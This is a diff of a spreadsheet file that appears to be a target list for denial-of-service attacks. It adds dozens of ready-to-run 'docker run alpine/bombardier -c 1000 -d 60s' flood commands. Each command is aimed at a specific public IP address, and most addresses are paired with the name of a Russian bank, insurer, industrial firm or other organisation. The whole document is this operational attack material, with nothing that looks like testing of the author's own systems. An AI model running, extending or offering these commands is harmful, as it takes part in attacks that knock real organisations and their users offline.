     <row r="74" ht="15.35" customHeight="1">
-      <c r="A74" s="2"/>
-      <c r="B74" s="8"/>
-      <c r="C74" s="2"/>
+      <c r="A74" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B74&amp;"&amp;&amp; sleep 5;"</f>
+        <v>126</v>
+      </c>
+      <c r="B74" t="s" s="8">
+        <v>127</v>
+      </c>
+      <c r="C74" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D74" s="3"/>
       <c r="E74" s="3"/>
     </row>
     <row r="75" ht="15.35" customHeight="1">
-      <c r="A75" s="2"/>
-      <c r="B75" s="8"/>
-      <c r="C75" s="2"/>
+      <c r="A75" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B75&amp;"&amp;&amp; sleep 5;"</f>
+        <v>128</v>
+      </c>
+      <c r="B75" t="s" s="8">
+        <v>129</v>
+      </c>
+      <c r="C75" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D75" s="3"/>
       <c r="E75" s="3"/>
     </row>
     <row r="76" ht="15.35" customHeight="1">
-      <c r="A76" s="2"/>
-      <c r="B76" s="8"/>
-      <c r="C76" s="2"/>
+      <c r="A76" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B76&amp;"&amp;&amp; sleep 5;"</f>
+        <v>130</v>
+      </c>
+      <c r="B76" t="s" s="8">
+        <v>131</v>
+      </c>
+      <c r="C76" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D76" s="3"/>
       <c r="E76" s="3"/>
     </row>
     <row r="77" ht="15.35" customHeight="1">
-      <c r="A77" s="2"/>
-      <c r="B77" s="8"/>
-      <c r="C77" s="2"/>
+      <c r="A77" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B77&amp;"&amp;&amp; sleep 5;"</f>
+        <v>132</v>
+      </c>
+      <c r="B77" t="s" s="8">
+        <v>133</v>
+      </c>
+      <c r="C77" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D77" s="3"/>
       <c r="E77" s="3"/>
     </row>
     <row r="78" ht="15.35" customHeight="1">
-      <c r="A78" s="2"/>
-      <c r="B78" s="8"/>
-      <c r="C78" s="2"/>
+      <c r="A78" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B78&amp;"&amp;&amp; sleep 5;"</f>
+        <v>134</v>
+      </c>
+      <c r="B78" t="s" s="8">
+        <v>135</v>
+      </c>
+      <c r="C78" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D78" s="3"/>
       <c r="E78" s="3"/>
     </row>
     <row r="79" ht="15.35" customHeight="1">
-      <c r="A79" s="2"/>
-      <c r="B79" s="8"/>
-      <c r="C79" s="2"/>
+      <c r="A79" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B79&amp;"&amp;&amp; sleep 5;"</f>
+        <v>136</v>
+      </c>
+      <c r="B79" t="s" s="8">
+        <v>137</v>
+      </c>
+      <c r="C79" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D79" s="3"/>
       <c r="E79" s="3"/>
     </row>
     <row r="80" ht="15.35" customHeight="1">
-      <c r="A80" s="2"/>
-      <c r="B80" s="8"/>
-      <c r="C80" s="2"/>
+      <c r="A80" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B80&amp;"&amp;&amp; sleep 5;"</f>
+        <v>124</v>
+      </c>
+      <c r="B80" t="s" s="8">
+        <v>125</v>
+      </c>
+      <c r="C80" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D80" s="3"/>
       <c r="E80" s="3"/>
     </row>
     <row r="81" ht="15.35" customHeight="1">
-      <c r="A81" s="2"/>
-      <c r="B81" s="8"/>
-      <c r="C81" s="2"/>
+      <c r="A81" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B81&amp;"&amp;&amp; sleep 5;"</f>
+        <v>138</v>
+      </c>
+      <c r="B81" t="s" s="8">
+        <v>139</v>
+      </c>
+      <c r="C81" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D81" s="3"/>
       <c r="E81" s="3"/>
     </row>
     <row r="82" ht="15.35" customHeight="1">
-      <c r="A82" s="2"/>
-      <c r="B82" s="8"/>
-      <c r="C82" s="2"/>
+      <c r="A82" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B82&amp;"&amp;&amp; sleep 5;"</f>
+        <v>140</v>
+      </c>
+      <c r="B82" t="s" s="8">
+        <v>141</v>
+      </c>
+      <c r="C82" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D82" s="3"/>
       <c r="E82" s="3"/>
     </row>
     <row r="83" ht="15.35" customHeight="1">
-      <c r="A83" s="2"/>
-      <c r="B83" s="8"/>
-      <c r="C83" s="2"/>
+      <c r="A83" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B83&amp;"&amp;&amp; sleep 5;"</f>
+        <v>142</v>
+      </c>
+      <c r="B83" t="s" s="8">
+        <v>143</v>
+      </c>
+      <c r="C83" t="s" s="2">
+        <v>123</v>
+      </c>
       <c r="D83" s="3"/>
       <c r="E83" s="3"/>
     </row>
     <row r="84" ht="15.35" customHeight="1">
-      <c r="A84" s="2"/>
-      <c r="B84" s="8"/>
-      <c r="C84" s="2"/>
+      <c r="A84" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B84&amp;"&amp;&amp; sleep 5;"</f>
+        <v>144</v>
+      </c>
+      <c r="B84" t="s" s="8">
+        <v>145</v>
+      </c>
+      <c r="C84" t="s" s="2">
+        <v>146</v>
+      </c>
       <c r="D84" s="3"/>
       <c r="E84" s="3"/>
     </row>
     <row r="85" ht="15.35" customHeight="1">
-      <c r="A85" s="2"/>
-      <c r="B85" s="8"/>
-      <c r="C85" s="2"/>
+      <c r="A85" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B85&amp;"&amp;&amp; sleep 5;"</f>
+        <v>147</v>
+      </c>
+      <c r="B85" t="s" s="8">
+        <v>148</v>
+      </c>
+      <c r="C85" t="s" s="2">
+        <v>149</v>
+      </c>
       <c r="D85" s="3"/>
       <c r="E85" s="3"/>
     </row>
     <row r="86" ht="15.35" customHeight="1">
-      <c r="A86" s="2"/>
-      <c r="B86" s="8"/>
-      <c r="C86" s="2"/>
+      <c r="A86" t="s" s="2">
+        <f>"sudo docker run -it alpine/bombardier -c 1000 -d 60s -l "&amp;B86&amp;"&amp;&amp; sleep 5;"</f>
+        <v>150</v>
+      </c>
+      <c r="B86" t="s" s="8">
+        <v>151</v>
+      </c>
+      <c r="C86" t="s" s="2">
+        <v>149</v>
+      </c>
       <c r="D86" s="3"/>
       <c r="E86" s="3"/>
     </row>

--- a/test.xlsx
+++ b/test.xlsx
@@ -11,90 +11,462 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="152">
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.13&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.239.13</t>
-  </si>
-  <si>
-    <t>tinkoff</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.139.106.197&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>94.139.106.197</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.3&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.239.3</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.163.21.220&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>81.163.21.220</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.208.136.183&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>89.208.136.183</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.200.243.197&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>185.200.243.197</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.228.114.162&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>94.228.114.162</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.195.155.204&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>176.195.155.204</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 79.137.239.199&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>79.137.239.199</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.130.129.234&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>94.130.129.234</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.236.218&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>178.248.236.218</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.124&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.66.78.124</t>
-  </si>
-  <si>
-    <t>reso</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.60&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.66.78.60</t>
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" uniqueCount="212">
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.169.155.189&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.169.155.189</t>
+  </si>
+  <si>
+    <t>дом.рф</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.86&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.86</t>
+  </si>
+  <si>
+    <t>acron.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.84.143.170&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.84.143.170</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.67</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 212.176.31.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>212.176.31.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.148.28.41&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.148.28.41</t>
+  </si>
+  <si>
+    <t>aton.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.94&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.94</t>
+  </si>
+  <si>
+    <t>efko.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.95&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.95</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.33.178&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.239.33.178</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.91&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.91</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.92&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.92</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.115.54&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.115.54</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.93&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.93</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.89&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.89</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.115.50&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.115.50</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 213.129.114.88&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>213.129.114.88</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.33.180&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.239.33.180</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.26.178.117&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.26.178.117</t>
+  </si>
+  <si>
+    <t>esplus.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.128.157.57&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.128.157.57</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.108.26.178&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.108.26.178</t>
+  </si>
+  <si>
+    <t>etalongroup.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.189.85&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.202.189.85</t>
+  </si>
+  <si>
+    <t>homecredit.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.25.216.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>89.25.216.67</t>
+  </si>
+  <si>
+    <t>kaspersky.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 34.233.9.163&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>34.233.9.163</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.19.104.7&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.19.104.7</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 81.19.104.10&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>81.19.104.10</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.159.226.45&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.159.226.45</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 66.110.49.76&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>66.110.49.76</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.159.226.48&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.159.226.48</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.74.181.76&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.74.181.76</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 113.29.117.33&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>113.29.117.33</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.74.177.249&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.74.177.249</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 93.159.226.41&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>93.159.226.41</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.104.85.140&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>89.104.85.140</t>
+  </si>
+  <si>
+    <t>lsgroup.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.223.109.112&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.223.109.112</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 89.148.196.145&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>89.148.196.145</t>
+  </si>
+  <si>
+    <t>metafrax.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.206.222.72&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.206.222.72</t>
+  </si>
+  <si>
+    <t>metalloinvest.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.236.176&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.236.176</t>
+  </si>
+  <si>
+    <t>mkb.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.236.104&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.236.104</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.233.246&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.233.246</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.238.237&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.238.237</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.234.187&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.234.187</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.238.238&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.238.238</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.191.76.73&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.191.76.73</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.191.76.112&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.191.76.112</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.191.76.118&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.191.76.118</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.200.16.53&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.200.16.53</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.238.236&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.238.236</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.232.214&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.232.214</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.191.76.68&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.191.76.68</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.71.67.37&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.71.67.37</t>
+  </si>
+  <si>
+    <t>mvideoeldorado.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 77.223.106.59&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>77.223.106.59</t>
+  </si>
+  <si>
+    <t>nornickel.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.92.186.48&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.92.186.48</t>
+  </si>
+  <si>
+    <t>novatek.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.196.245.104&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.196.245.104</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.195.100.86&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.195.100.86</t>
+  </si>
+  <si>
+    <t>phosagro.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.195.108.157&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>217.195.108.157</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.129.124.20&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>31.129.124.20</t>
+  </si>
+  <si>
+    <t>polyus.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.16.93.20&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.16.93.20</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.239.143.190&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.239.143.190</t>
+  </si>
+  <si>
+    <t>power-m.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.146&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.146</t>
+  </si>
+  <si>
+    <t>raiffeisen.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.212&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.212</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.140&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.140</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.156&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.156</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.145&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.145</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 193.28.44.157&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>193.28.44.157</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.238.72.114&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.238.72.114</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.2&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.66.78.2</t>
+  </si>
+  <si>
+    <t>reso.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.28&amp;&amp; sleep 5;</t>
@@ -103,31 +475,22 @@
     <t>195.66.78.28</t>
   </si>
   <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.140&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.66.78.140</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.234&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.66.78.234</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.66.78.125&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>195.66.78.125</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 78.155.198.90&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>78.155.198.90</t>
-  </si>
-  <si>
-    <t>nornickel</t>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.190.20.120&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.190.20.120</t>
+  </si>
+  <si>
+    <t>rgs.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.17.10.74&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.17.10.74</t>
+  </si>
+  <si>
+    <t>rossetimr.ru</t>
   </si>
   <si>
     <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.210.21.54&amp;&amp; sleep 5;</t>
@@ -136,22 +499,124 @@
     <t>195.210.21.54</t>
   </si>
   <si>
-    <t>R-pharm</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.195.108.157&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.195.108.157</t>
-  </si>
-  <si>
-    <t>phosagro</t>
-  </si>
-  <si>
-    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 217.195.100.86&amp;&amp; sleep 5;</t>
-  </si>
-  <si>
-    <t>217.195.100.86</t>
+    <t>r-pharm.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.16.117.206&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>195.16.117.206</t>
+  </si>
+  <si>
+    <t>rshb.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.154.197.231&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.154.197.231</t>
+  </si>
+  <si>
+    <t>samolet.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 82.202.246.121&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>82.202.246.121</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 92.53.118.141&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>92.53.118.141</t>
+  </si>
+  <si>
+    <t>segezha-group.com</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.47.160.18&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>84.47.160.18</t>
+  </si>
+  <si>
+    <t>seligdar.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 84.47.160.19&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>84.47.160.19</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 5.23.51.195&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>5.23.51.195</t>
+  </si>
+  <si>
+    <t>severstal-avia.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.114.80.117&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>188.114.80.117</t>
+  </si>
+  <si>
+    <t>sibur.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.239.98.164&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.239.98.164</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.239.98.163&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.239.98.163</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 194.55.245.238&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>194.55.245.238</t>
+  </si>
+  <si>
+    <t>skolkovo.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 178.248.239.44&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>178.248.239.44</t>
+  </si>
+  <si>
+    <t>suek.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.98.85.145&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>185.98.85.145</t>
+  </si>
+  <si>
+    <t>tn.ru</t>
+  </si>
+  <si>
+    <t>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.107.67.67&amp;&amp; sleep 5;</t>
+  </si>
+  <si>
+    <t>91.107.67.67</t>
